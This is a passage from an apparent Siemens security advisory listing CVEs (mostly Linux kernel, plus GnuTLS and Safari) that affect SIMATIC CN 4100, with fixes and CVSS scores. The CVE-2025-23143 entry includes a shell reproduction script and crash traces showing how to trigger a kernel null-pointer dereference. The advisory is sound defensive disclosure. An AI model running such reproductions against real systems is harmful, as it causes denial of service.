3.1 and 3.0 are not affected by this issue, as the HTTP client implementation is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-9820 A flaw was found in the GnuTLS library, specifically in the gnutls_pkcs11_token_init() function that handles PKCS#11 token initialization. When a token label longer than expected is processed, the function writes past the end of a fixed-size stack buffer. This programming error can cause the application using GnuTLS to crash or, in certain conditions, be exploited for code execution. As a result, systems or applications relying on GnuTLS may be vulnerable to a denial of service or local privilege escalation attacks. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 4 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2025-14831 A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-407 Inefficient Algorithmic Complexity Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2025-23143 In the Linux kernel, the following vulnerability has been resolved: net: Fix null-ptr-deref by sock_lock_init_class_and_name() and rmmod. When I ran the repro [0] and waited a few seconds, I observed two LOCKDEP splats: a warning immediately followed by a null-ptr-deref. [1] Reproduction Steps: 1) Mount CIFS 2) Add an iptables rule to drop incoming FIN packets for CIFS 3) Unmount CIFS 4) Unload the CIFS module 5) Remove the iptables rule At step 3), the CIFS module calls sock_release() for the underlying TCP socket, and it returns quickly. However, the socket remains in FIN_WAIT_1 because incoming FIN packets are dropped. At this point, the module's refcnt is 0 while the socket is still alive, so the following rmmod command succeeds. # ss -tan State Recv-Q Send-Q Local Address:Port Peer Address:Port FIN-WAIT-1 0 477 10.0.2.15:51062 10.0.0.137:445 # lsmod | grep cifs cifs 1159168 0 This highlights a discrepancy between the lifetime of the CIFS module and the underlying TCP socket. Even after CIFS calls sock_release() and it returns, the TCP socket does not die immediately in order to close the connection gracefully. While this is generally fine, it causes an issue with LOCKDEP because CIFS assigns a different lock class to the TCP socket's sk->sk_lock using sock_lock_init_class_and_name(). Once an incoming packet is processed for the socket or a timer fires, sk->sk_lock is acquired. Then, LOCKDEP checks the lock context in check_wait_context(), where hlock_class() is called to retrieve the lock class. However, since the module has already been unloaded, hlock_class() logs a warning and returns NULL, triggering the null-ptr-deref. If LOCKDEP is enabled, we must ensure that a module calling sock_lock_init_class_and_name() (CIFS, NFS, etc) cannot be unloaded while such a socket is still alive to prevent this issue. Let's hold the module reference in sock_lock_init_class_and_name() and release it when the socket is freed in sk_prot_free(). Note that sock_lock_init() clears sk->sk_owner for svc_create_socket() that calls sock_lock_init_class_and_name() for a listening socket, which clones a socket by sk_clone_lock() without GFP_ZERO. [0]: CIFS_SERVER="10.0.0.137" CIFS_PATH="//${CIFS_SERVER}/Users/Administrator/Desktop/CIFS_TEST" DEV="enp0s3" CRED="/root/WindowsCredential.txt" MNT=$(mktemp -d /tmp/XXXXXX) mount -t cifs ${CIFS_PATH} ${MNT} -o vers=3.0,credentials=${CRED},cache=none,echo_interval=1 iptables -A INPUT -s ${CIFS_SERVER} -j DROP for i in $(seq 10); do umount ${MNT} rmmod cifs sleep 1 done rm -r ${MNT} iptables -D INPUT -s ${CIFS_SERVER} -j DROP [1]: DEBUG_LOCKS_WARN_ON(1) WARNING: CPU: 10 PID: 0 at kernel/locking/lockdep.c:234 hlock_class (kernel/locking/lockdep.c:234 kernel/locking/lockdep.c:223) Modules linked in: cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs] CPU: 10 UID: 0 PID: 0 Comm: swapper/10 Not tainted 6.14.0 #36 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:hlock_class (kernel/locking/lockdep.c:234 kernel/locking/lockdep.c:223) ... Call Trace: __lock_acquire (kernel/locking/lockdep.c:4853 kernel/locking/lockdep.c:5178) lock_acquire (kernel/locking/lockdep.c:469 kernel/locking/lockdep.c:5853 kernel/locking/lockdep.c:5816) _raw_spin_lock_nested (kernel/locking/spinlock.c:379) tcp_v4_rcv (./include/linux/skbuff.h:1678 ./include/net/tcp.h:2547 net/ipv4/tcp_ipv4.c:2350) ... BUG: kernel NULL pointer dereference, address: 00000000000000c4 PF: supervisor read access in kernel mode PF: error_code(0x0000) - not-present page PGD 0 Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 10 UID: 0 PID: 0 Comm: swapper/10 Tainted: G W 6.14.0 #36 Tainted: [W]=WARN Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:__lock_acquire (kernel/ ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-23160 In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: Fix a resource leak related to the scp device in FW initialization On Mediatek devices with a system companion processor (SCP) the mtk_scp structure has to be removed explicitly to avoid a resource leak. Free the structure in case the allocation of the firmware structure fails during the firmware initialization. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-401 Missing Release of Memory after Effective Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-31257 This issue was addressed with improved memory handling. This issue is fixed in Safari 18.5, iOS 18.5 and iPadOS 18.5, macOS Sequoia 15.5, tvOS 18.5, visionOS 2.5, watchOS 11.5. Processing maliciously crafted web content may lead to an unexpected Safari crash. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.7 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L CVE-2025-37931 In the Linux kernel, the following vulnerability has been resolved: btrfs: adjust subpage bit start based on sectorsize When running machines with 64k page size and a 16k nodesize we started seeing tree log corruption in production. This turned out to be because we were not writing out dirty blocks sometimes, so this in fact affects all metadata writes. When writing out a subpage EB we scan the subpage bitmap for a dirty range. If the range isn't dirty we do bit_start++; to move onto the next bit. The problem is the bitmap is based on the number of sectors that an EB has. So in this case, we have a 64k pagesize, 16k nodesize, but a 4k sectorsize. This means our bitmap is 4 bits for every node. With a 64k page size we end up with 4 nodes per page. To make this easier this is how everything looks [0 16k 32k 48k ] logical address [0 4 8 12 ] radix tree offset [ 64k page ] folio [ 16k eb ][ 16k eb ][ 16k eb ][ 16k eb ] extent buffers [ | | | | | | | | | | | | | | | | ] bitmap Now we use all of our addressing based on fs_info->sectorsize_bits, so as you can see the above our 16k eb->start turns into radix entry 4. When we find a dirty range for our eb, we correctly do bit_start += sectors_per_node, because if we start at bit 0, the next bit for the next eb is 4, to correspond to eb->start 16k. However if our range is clean, we will do bit_start++, which will now put us offset from our radix tree entries. In our case, assume that the first time we check the bitmap the block is not dirty, we increment bit_start so now it == 1, and then we loop around and check again. This time it is dirty, and we go to find that start using the following equation start = folio_start + bit_start * fs_info->sectorsize; so in the case above, eb->start 0 is now dirty, and we calculate start as 0 + 1 * fs_info->sectorsize = 4096 4096 >> 12 = 1 Now we're looking up the radix tree for 1, and we won't find an eb. What's worse is now we're using bit_start == 1, so we do bit_start += sectors_per_node, which is now 5. If that eb is dirty we will run into the same thing, we will look at an offset that is not populated in the radix tree, and now we're skipping the writeout of dirty extent buffers. The best fix for this is to not use sectorsize_bits to address nodes, but that's a larger change. Since this is a fs corruption problem fix it simply by always using sectors_per_node to increment the start bit. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-37968 In the Linux kernel, the following vulnerability has been resolved: iio: light: opt3001: fix deadlock due to concurrent flag access The threaded IRQ function in this driver is reading the flag twice: once to lock a mutex and once to unlock it. Even though the code setting the flag is designed to prevent it, there are subtle cases where the flag could be true at the mutex_lock stage and false at the mutex_unlock stage. This results in the mutex not being unlocked, resulting in a deadlock. Fix it by making the opt3001_irq() code generally more robust, reading the flag into a variable and using the variable value at both stages. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-667 Improper Locking Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38322 In the Linux kernel, the following vulnerability has been resolved: perf/x86/intel: Fix crash in icl_update_topdown_event() The perf_fuzzer found a hard-lockup crash on a RaptorLake machine: Oops: general protection fault, maybe for address 0xffff89aeceab400: 0000 CPU: 23 UID: 0 PID: 0 Comm: swapper/23 Tainted: [W]=WARN Hardware name: Dell Inc. Precision 9660/0VJ762 RIP: 0010:native_read_pmc+0x7/0x40 Code: cc e8 8d a9 01 00 48 89 03 5b cd cc cc cc cc 0f 1f ... RSP: 000:fffb03100273de8 EFLAGS: 00010046 .... Call Trace: icl_update_topdown_event+0x165/0x190 ? ktime_get+0x38/0xd0 intel_pmu_read_event+0xf9/0x210 __perf_event_read+0xf9/0x210 CPUs 16-23 are E-core CPUs that don't support the perf metrics feature. The icl_update_topdown_event() should not be invoked on these CPUs. It's a regression of commit: f9bdf1f95339 ("perf/x86/intel: Avoid disable PMU if !cpuc->enabled in sample read") The bug introduced by that commit is that the is_topdown_event() function is mistakenly used to replace the is_topdown_count() call to check if the topdown functions for the perf metrics feature should be invoked. Fix it. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38347 In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to do sanity check on ino and xnid syzbot reported a f2fs bug as below: INFO: task syz-executor140:5308 blocked for more than 143 seconds. Not tainted 6.14.0-rc7-syzkaller-00069-g81e4f8d68c66 #0 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:syz-executor140 state:D stack:24016 pid:5308 tgid:5308 ppid:5306 task_flags:0x400140 flags:0x00000006 Call Trace: context_switch kernel/sched/core.c:5378 [inline] __schedule+0x190e/0x4c90 kernel/sched/core.c:6765 __schedule_loop kernel/sched/core.c:6842 [inline] schedule+0x14b/0x320 kernel/sched/core.c:6857 io_schedule+0x8d/0x110 kernel/sched/core.c:7690 folio_wait_bit_common+0x839/0xee0 mm/filemap.c:1317 __folio_lock mm/filemap.c:1664 [inline] folio_lock include/linux/pagemap.h:1163 [inline] __filemap_get_folio+0x147/0xb40 mm/filemap.c:1917 pagecache_get_page+0x2c/0x130 mm/folio-compat.c:87 find_get_page_flags include/linux/pagemap.h:842 [inline] f2fs_grab_cache_page+0x2b/0x320 fs/f2fs/f2fs.h:2776 __get_node_page+0x131/0x11b0 fs/f2fs/node.c:1463 read_xattr_block+0xfb/0x190 fs/f2fs/xattr.c:306 lookup_all_xattrs fs/f2fs/xattr.c:355 [inline] f2fs_getxattr+0x676/0xf70 fs/f2fs/xattr.c:533 __f2fs_get_acl+0x52/0x870 fs/f2fs/acl.c:179 f2fs_acl_create fs/f2fs/acl.c:375 [inline] f2fs_init_acl+0xd7/0x9b0 fs/f2fs/acl.c:418 f2fs_init_inode_metadata+0xa0f/0x1050 fs/f2fs/dir.c:539 f2fs_add_inline_entry+0x448/0x860 fs/f2fs/inline.c:666 f2fs_add_dentry+0xba/0x1e0 fs/f2fs/dir.c:765 f2fs_do_add_link+0x28c/0x3a0 fs/f2fs/dir.c:808 f2fs_add_link fs/f2fs/f2fs.h:3616 [inline] f2fs_mknod+0x2e8/0x5b0 fs/f2fs/namei.c:766 vfs_mknod+0x36d/0x3b0 fs/namei.c:4191 unix_bind_bsd net/unix/af_unix.c:1286 [inline] unix_bind+0x563/0xe30 net/unix/af_unix.c:1379 __sys_bind_socket net/socket.c:1817 [inline] __sys_bind+0x1e4/0x290 net/socket.c:1848 __do_sys_bind net/socket.c:1853 [inline] __se_sys_bind net/socket.c:1851 [inline] __x64_sys_bind+0x7a/0x90 net/socket.c:1851 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Let's dump and check metadata of corrupted inode, it shows its xattr_nid is the same to its i_ino. dump.f2fs -i 3 chaseyu.img.raw i_xattr_nid [0x 3 : 3] So that, during mknod in the corrupted directory, it tries to get and lock inode page twice, result in deadlock. - f2fs_mknod - f2fs_add_inline_entry - f2fs_get_inode_page --- lock dir's inode page - f2fs_init_acl - f2fs_acl_create(dir,..) - __f2fs_get_acl - f2fs_getxattr - lookup_all_xattrs - __get_node_page --- try to lock dir's inode page In order to fix this, let's add sanity check on ino and xnid. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38491 In the Linux kernel, the following vulnerability has been resolved: mptcp: make fallback action and fallback decision atomic Syzkaller reported the following splat: WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 __mptcp_do_fallback net/mptcp/protocol.h:1223 [inline] WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 mptcp_do_fallback net/mptcp/protocol.h:1244 [inline] WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 check_fully_established net/mptcp/options.c:982 [inline] WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 mptcp_incoming_options+0x21a8/0x2510 net/mptcp/options.c:1153 Modules linked in: CPU: 1 UID: 0 PID: 7704 Comm: syz.3.1419 Not tainted 6.16.0-rc3-gbd5ce2324dba #20 PREEMPT(voluntary) Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 RIP: 0010:__mptcp_do_fallback net/mptcp/protocol.h:1223 [inline] RIP: 0010:mptcp_do_fallback net/mptcp/protocol.h:1244 [inline] RIP: 0010:check_fully_established net/mptcp/options.c:982 [inline] RIP: 0010:mptcp_incoming_options+0x21a8/0x2510 net/mptcp/options.c:1153 Code: 24 18 e8 bb 2a 00 fd e9 1b df ff ff e8 b1 21 0f 00 e8 ec 5f c4 fc 44 0f b7 ac 24 b0 00 00 00 e9 54 f1 ff ff e8 d9 5f c4 fc 90 <0f> 0b 90 e9 b8 f4 ff ff e8 8b 2a 00 fd e9 8d e6 ff ff e8 81 2a 00 RSP: 0018:ffff8880a3f08448 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff8880180a8000 RCX: ffffffff84afcf45 RDX: ffff888090223700 RSI: ffffffff84afdaa7 RDI: 0000000000000001 RBP: ffff888017955780 R08: 0000000000000001 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000 R13: ffff8880180a8910 R14: ffff8880a3e9d058 R15: 0000000000000000 FS: 00005555791b8500(0000) GS:ffff88811c495000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000110c2800b7 CR3: 0000000058e44000 CR4: 0000000000350ef0 Call Trace: tcp_reset+0x26f/0x2b0 net/ipv4/tcp_input.c:4432 tcp_validate_incoming+0x1057/0x1b60 net/ipv4/tcp_input.c:5975 tcp_rcv_established+0x5b5/0x21f0 net/ipv4/tcp_input.c:6166 tcp_v4_do_rcv+0x5dc/0xa70 net/ipv4/tcp_ipv4.c:1925 tcp_v4_rcv+0x3473/0x44a0 net/ipv4/tcp_ipv4.c:2363 ip_protocol_deliver_rcu+0xba/0x480 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x2f1/0x500 net/ipv4/ip_input.c:233 NF_HOOK include/linux/netfilter.h:317 [inline] NF_HOOK include/linux/netfilter.h:311 [inline] ip_local_deliver+0x1be/0x560 net/ipv4/ip_input.c:254 dst_input include/net/dst.h:469 [inline] ip_rcv_finish net/ipv4/ip_input.c:447 [inline] NF_HOOK include/linux/netfilter.h:317 [inline] NF_HOOK include/linux/netfilter.h:311 [inline] ip_rcv+0x514/0x810 net/ipv4/ip_input.c:567 __netif_receive_skb_one_core+0x197/0x1e0 net/core/dev.c:5975 __netif_receive_skb+0x1f/0x120 net/core/dev.c:6088 process_backlog+0x301/0x1360 net/core/dev.c:6440 __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7453 napi_poll net/core/dev.c:7517 [inline] net_rx_action+0xb44/0x1010 net/core/dev.c:7644 handle_softirqs+0x1d0/0x770 kernel/softirq.c:579 do_softirq+0x3f/0x90 kernel/softirq.c:480 __local_bh_enable_ip+0xed/0x110 kernel/softirq.c:407 local_bh_enable include/linux/bottom_half.h:33 [inline] inet_csk_listen_stop+0x2c5/0x1070 net/ipv4/inet_connection_sock.c:1524 mptcp_check_listen_stop.part.0+0x1cc/0x220 net/mptcp/protocol.c:2985 mptcp_check_listen_stop net/mptcp/mib.h:118 [inline] __mptcp_close+0x9b9/0xbd0 net/mptcp/protocol.c:3000 mptcp_close+0x2f/0x140 net/mptcp/protocol.c:3066 inet_release+0xed/0x200 net/ipv4/af_inet.c:435 inet6_release+0x4f/0x70 net/ipv6/af_inet6.c:487 __sock_release+0xb3/0x270 net/socket.c:649 sock_close+0x1c/0x30 net/socket.c:1439 __fput+0x402/0xb70 fs/file_table.c:465 task_work_run+0x150/0x240 kernel/task_work.c:227 resume_user_mode_work include/linux/resume_user_mode.h:50 [inline] exit_to_user_mode_loop+0xd4 ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-667 Improper Locking Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38502 In the Linux kernel, the following vulnerability has been resolved: bpf: Fix oob access in cgroup local storage Lonial reported that an out-of-bounds access in cgroup local storage can be crafted via tail calls. Given two programs each utilizing a cgroup local storage with a different value size, and one program doing a tail call into the other. The verifier will validate each of the indivial programs just fine. However, in the runtime context the bpf_cg_run_ctx holds an bpf_prog_array_item which contains the BPF program as well as any cgroup local storage flavor the program uses. Helpers such as bpf_get_local_storage() pick this up from the runtime context: ctx = container_of(current->bpf_ctx, struct bpf_cg_run_ctx, run_ctx); storage = ctx->prog_item->cgroup_storage[stype]; if (stype == BPF_CGROUP_STORAGE_SHARED) ptr = &READ_ONCE(storage->buf)->data[0]; else ptr = this_cpu_ptr(storage->percpu_buf); For the second program which was called from the originally attached one, this means bpf_get_local_storage() will pick up the former program's map, not its own. With mismatching sizes, this can result in an unintended out-of-bounds access. To fix this issue, we need to extend bpf_map_owner with an array of storage_cookie[] to match on i) the exact maps from the original program if the second program was using bpf_get_local_storage(), or ii) allow the tail call combination if the second program was not using any of the cgroup local storage maps. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 4 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2025-38552 In the Linux kernel, the following vulnerability has been resolved: mptcp: plug races between subflow fail and subflow creation We have races similar to the one addressed by the previous patch between subflow failing and additional subflow creation. They are just harder to trigger. The solution is similar. Use a separate flag to track the condition 'socket state prevent any additional subflow creation' protected by the fallback lock. The socket fallback makes such flag true, and also receiving or sending an MP_FAIL option. The field 'allow_infinite_fallback' is now always touched under the relevant lock, we can drop the ONCE annotation on write. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H CVE-2025-38614 In the Linux kernel, the following vulnerability has been resolved: eventpoll: Fix semi-unbounded recursion Ensure that epoll instances can never form a graph deeper than EP_MAX_NESTS+1 links. Currently, ep_loop_check_proc() ensures that the graph is loop-free and does some recursion depth checks, but those recursion depth checks don't limit the depth of the resulting tree for two reasons: - They don't look upwards in the tree. - If there are multiple downwards paths of different lengths, only one of the paths is actually considered for the depth check since commit 28d82dc1c4ed ("epoll: limit paths"). Essentially, the current recursion depth check in ep_loop_check_proc() just serves to prevent it from recursing too deeply while checking for loops. A more thorough check is done in reverse_path_check() after the new graph edge has already been created; this checks, among other things, that no paths going upwards from any non-epoll file with a length of more than 5 edges exist. However, this check does not apply to non-epoll files. As a result, it is possible to recurse to a depth of at least roughly 500, tested on v6.15. (I am unsure if deeper recursion is possible; and this may have changed with commit 8c44dac8add7 ("eventpoll: Fix priority inversion problem").) To fix it: 1. In ep_loop_check_proc(), note the subtree depth of each visited node, and use subtree depths for the total depth calculation even when a subtree has already been visited. 2. Add ep_get_upwards_depth_proc() for similarly determining the maximum depth of an upwards walk. 3. In ep_loop_check(), use these values to limit the total path length between epoll nodes to EP_MAX_NESTS edges. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-674 Uncontrolled Recursion Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38670 In the Linux kernel, the following vulnerability has been resolved: arm64/entry: Mask DAIF in cpu_switch_to(), call_on_irq_stack() `cpu_switch_to()` and `call_on_irq_stack()` manipulate SP to change to different stacks along with the Shadow Call Stack if it is enabled. Those two stack changes cannot be done atomically and both functions can be interrupted by SErrors or Debug Exceptions which, though unlikely, is very much broken : if interrupted, we can end up with mismatched stacks and Shadow Call Stack leading to clobbered stacks. In `cpu_switch_to()`, it can happen when SP_EL0 points to the new task, but x18 stills points to the old task's SCS. When the interrupt handler tries to save the task's SCS pointer, it will save the old task SCS pointer (x18) into the new task struct (pointed to by SP_EL0), clobbering it. In `call_on_irq_stack()`, it can happen when switching from the task stack to the IRQ stack and when switching back. In both cases, we can be interrupted when the SCS pointer points to the IRQ SCS, but SP points to the task stack. The nested interrupt handler pushes its return addresses on the IRQ SCS. It then detects that SP points to the task stack, calls `call_on_irq_stack()` and clobbers the task SCS pointer with the IRQ SCS pointer, which it will also use ! This leads to tasks returning to addresses on the wrong SCS, or even on the IRQ SCS, triggering kernel panics via CONFIG_VMAP_STACK or FPAC if enabled. This is possible on a default config, but unlikely. However, when enabling CONFIG_ARM64_PSEUDO_NMI, DAIF is unmasked and instead the GIC is responsible for filtering what interrupts the CPU should receive based on priority. Given the goal of emulating NMIs, pseudo-NMIs can be received by the CPU even in `cpu_switch_to()` and `call_on_irq_stack()`, possibly *very* frequently depending on the system configuration and workload, leading to unpredictable kernel panics. Completely mask DAIF in `cpu_switch_to()` and restore it when returning. Do the same in `call_on_irq_stack()`, but restore and mask around the branch. Mask DAIF even if CONFIG_SHADOW_CALL_STACK is not enabled for consistency of behaviour between all configurations. Introduce and use an assembly macro for saving and masking DAIF, as the existing one saves but only masks IF. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38676 In the Linux kernel, the following vulnerability has been resolved: iommu/amd: Avoid stack buffer overflow from kernel cmdline While the kernel command line is considered trusted in most environments, avoid writing 1 byte past the end of "acpiid" if the "str" argument is maximum length. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-805 Buffer Access with Incorrect Length Value Metrics CVSS Version Base Score Base Severity Vector String 3.1 6 MEDIUM CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H CVE-2025-38677 In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to avoid out-of-boundary access in dnode page As Jiaming Zhang reported: __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x1c1/0x2a0 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0x17e/0x800 mm/kasan/report.c:480 kasan_report+0x147/0x180 mm/kasan/report.c:593 data_blkaddr fs/f2fs/f2fs.h:3053 [inline] f2fs_data_blkaddr fs/f2fs/f2fs.h:3058 [inline] f2fs_get_dnode_of_data+0x1a09/0x1c40 fs/f2fs/node.c:855 f2fs_reserve_block+0x53/0x310 fs/f2fs/data.c:1195 prepare_write_begin fs/f2fs/data.c:3395 [inline] f2fs_write_begin+0xf39/0x2190 fs/f2fs/data.c:3594 generic_perform_write+0x2c7/0x910 mm/filemap.c:4112 f2fs_buffered_write_iter fs/f2fs/file.c:4988 [inline] f2fs_file_write_iter+0x1ec8/0x2410 fs/f2fs/file.c:5216 new_sync_write fs/read_write.c:593 [inline] vfs_write+0x546/0xa90 fs/read_write.c:686 ksys_write+0x149/0x250 fs/read_write.c:738 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xf3/0x3d0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f The root cause is in the corrupted image, there is a dnode has the same node id w/ its inode, so during f2fs_get_dnode_of_data(), it tries to access block address in dnode at offset 934, however it parses the dnode as inode node, so that get_dnode_addr() returns 360, then it tries to access page address from 360 + 934 * 4 = 4096 w/ 4 bytes. To fix this issue, let's add sanity check for node id of all direct nodes during f2fs_get_dnode_of_data(). View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38679 In the Linux kernel, the following vulnerability has been resolved: media: venus: Fix OOB read due to missing payload bound check Currently, The event_seq_changed() handler processes a variable number of properties sent by the firmware. The number of properties is indicated by the firmware and used to iterate over the payload. However, the payload size is not being validated against the actual message length. This can lead to out-of-bounds memory access if the firmware provides a property count that exceeds the data available in the payload. Such a condition can result in kernel crashes or potential information leaks if memory beyond the buffer is accessed. Fix this by 